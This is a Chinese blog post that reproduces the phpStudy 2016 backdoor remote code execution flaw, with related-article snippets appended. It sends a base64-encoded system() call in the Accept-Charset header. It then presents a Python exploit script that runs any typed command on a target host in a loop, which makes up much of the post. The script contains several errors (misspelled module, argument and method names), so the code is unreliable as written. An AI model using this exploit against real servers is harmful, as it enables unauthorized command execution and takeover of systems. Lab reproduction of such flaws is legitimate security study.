phpstudy_2016_RCE 漏洞复现以及exp编写

最新推荐文章于 2023-07-22 17:05:50 发布
最新推荐文章于 2023-07-22 17:05:50 发布
阅读量161 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oyqsb/article/details/131866281
版权

RCE漏洞

phpstudy漏洞复现

编写exp

RCE漏洞

         RCE(远程代码执行漏洞),可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。通常是由于服务器没有对执行的命令或代码做严格的过滤,最终导致攻击者上传的恶意命令或代码被执行。

phpstudy漏洞复现

        启动phpstudy,我使用的phpstudy版本是2016_5.4.45。

        访问phpstudy页面,使用bp抓包。

        将数据包发送至Repeater重放模块

         然后就是插入漏洞验证代码,可以看到重放包后页面返回了执行ipconfig后的回显

                Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
                Accept-Encoding: gzip,deflate(原数据包内若已经有了记得去空格)

         ’c3lzdGVtKCdpcGNvbmZpZycpOw==‘其实就是ipconfig使用base64编码后的命令,也就是说我们可以通过修改数据包内容来达到远程命令执行的效果。

 编写exp

# phpstudy_2016_rce.py

import requests
import base64

while True:
    url = "http://192.168.66.29"
    inp = input("Please input:")
    cmd = f"system('{inp}');"        #编写命令执行代码
    cmd = base64.b64encode(cmd.encode())    #对代码进行base64编码

    headers = {
        "User-Agent"    :    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0)  Gecko/20100101 Firefox/115.0",
        "Accept-Charset"    :    cmd,                #构造头部  
        "Accept-Encoding"    :    "gzip,deflate"
    } 
    res = request.get(url = url , heraders = headers)    #请求包
    reslut = res.content.decode("gb2312")        #gb2312编码
    reslut = reslut[0:reslut.finf("<DOCTYPE html")]    #利用切片过滤回显
    print(reslut)
    if inp == "qu" :        #输入qu响应退出
        break

效果如下

        

睡了有点困
关注
专栏目录
phpstudy2016 RCE漏洞验证
m0_56578216的博客
09-21 489
PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指软件中存在的一个远程代码执行漏洞
phpunit 远程代码执行漏洞(CVE-2017-9841、eval-stdin.php
最新发布
墨痕诉清风的博客
07-15 514
PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架,通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞
phpunit 远程代码执行漏洞(CVE-2017-9841)
这周末在做梦的博客
12-21 2864
本次分享内容为蓝帽杯中web-php的一道题目中的关键漏洞,由于本人技术不够成熟,无法进行完全的复现,还请见谅。 一,漏洞概述: PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架,通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。 二,漏洞版本: 4.8.19 ~ 4.8.27、 5.0.10 ~ 5
phpstudy_2016-2018_rce漏洞复现
m0_64583632的博客
11-10 915
phpstudy2016phpstudy2018rce漏洞复现
phpStudy远程RCE漏洞复现
weixin_43268670的博客
07-03 2038
大家好,刚刚来到csdn这个大家庭,以后准备把自己在网络安全的一些小知识记录在此,希望能和大家好好交流。 需要的工具: VMware Workstation Pro Windows7的/ 2008R2 BurpSuiteFree phpStudy20161103.zip(文中使用)phpStudy20180211.zip Python ...
记一次phpstudy后门漏洞复现
Animation77的博客
10-30 1608
通过查阅资料,后门代码存在于\ext\php_xmlrpc.dll模块中 phpStudy2016phpStudy2018自带的php-5.2.17、php-5.4.45 phpStudy2016路径 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018路径 PHPTutorial\php...
PhpStudy_2016-2018_RCE漏洞复现
认真走好每一小步
07-22 150
PhpStudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可一键安装与搭建。其中2016、2018版本的phpStudy存在RCE漏洞,该漏洞直接可以远程执行系统命令。添加这两字段之前我们需要,将执行得命令进行Base64编码。#认真走好每一小步 请多指教。
phpstudy_2016.11.03.zip
03-14
phpstudy_2016.11.03这个压缩包中,包含了PHPStudy的主要组件和相关配置文件。用户解压后,可以找到phpStudy.exe主程序,通过双击运行,即可启动PHPStudy的控制台。控制台界面简洁明了,提供了如新建网站、修改...
phpStudy_2016.11.03后门版.zip
09-29
在本例中,"phpStudy_2016.11.03后门版.zip"是一个包含了可能含有恶意后门的PHP开发环境——phpStudy的版本。phpStudy是一款广泛使用的集成PHP开发环境,它集成了Apache服务器、MySQL数据库以及PHP等组件,方便...
phpStudy_2016.11.03.zip
04-24
mysql服务器高负载的情况下,必须采取一种措施给服务器减轻压力,减少服务器的I/O操作。一般采用的方法是优化sql操作语句,优化服务器的配置参数,从而提高服务器的性能。Mysql使用了几种内存缓存数据的策略来提高...
【威胁分析】phpunit远程代码执行漏洞
sinat_35058227的博客
08-29 3202
phpunit是php中的单元测试工具 其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 有一个eval eval('?>'.file_get_contents('php://input')); 直接将PHP代码作为POST Body发送 即可执行php代码 威胁分析: 1、分析是否利用该漏洞 uri为:/vendor/phpunit/phpunit/src/Util/PHP
PHPUnit远程代码执行漏洞 CVE-2017-9841 漏洞复现
ADummy的博客
02-27 3135
PHPUnit远程执行代码(CVE-2017-9841) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>命令执行 0x01漏洞介绍 PHPUnit是面向程序员的PHP测试框架。 Util/PHP/eval-stdin.php在4.8.28之前的PHPUnit和5.6.3之前的5.x中允许远程攻击者通过以<?php子字符串开头的HTTP POST数据执行任意PHP代码,如对具有暴露的/ vendor文件夹的站点的攻击(即外部访问)所证明的到/vendor/phpuni
phpStudy2016的简单使用
qq_41549657的博客
04-07 2247
下面是phpStudy2016的运行界面 如图上说明,进入之后首先应该需要将Apache停止运行(因为我的项目没有用到),当然如果你需要使用的话也是可以不停止的,停止方法是在其他选项菜单里面 上述操作完成之后,便可以点击MySAL管理器按钮,进入如下界面, 然后导入你所需要导入的数据库文件,一些重要信息在图上已经写出 文件导入完成后,点击导入按钮即可 之后返回程序主界面,如下图,...
phpstudy搭建渗透测试环境
Z_l123的博客
01-12 657
工具 phpstudy2018 靶场平台 DWVA SQL 步骤 1.运行phpstudy并打开phpstudy网站根目录 2.将下载好的靶场平台安装包放进去并解压 3.DWVA:dvwa>config>config.inc.php.dist 修改为下图,保存后将文件名config.inc.php.dist改为config.inc.php 4.火狐访问http://127.0.0.1/dvwa 5.在phpstudy中 其他选项菜单>PH..
phpstudy后门dll文件命令执行漏洞复现
来到了学渣的博客
11-08 3004
一直安装了phpstudy这个玩意,但没想到这个集成工具还有后门漏洞,于是我一探究竟,环境启动 查了下资料,漏洞版本和路径主要如下 漏洞版本 phpstudy 2016php-5.4 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45 phpStudy2016路径 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018路径 PHPTutorial\
PhpStudy后门漏洞实战复现
la-大白
10-28 4880
phpstudy后门漏洞
php5.4漏洞解决,php5.4.3的远程代码执行漏洞,提权挺管用
weixin_42365539的博客
03-13 814
PHP com_print_typeinfo()的漏洞,通过PHP代码调用"exec"可运行SHELL命令用这个提权是不是很方便了?// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)// Exploit author: 0in (Maksymilian Motyl)// Email: 0in(dot)email(at)gmai...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值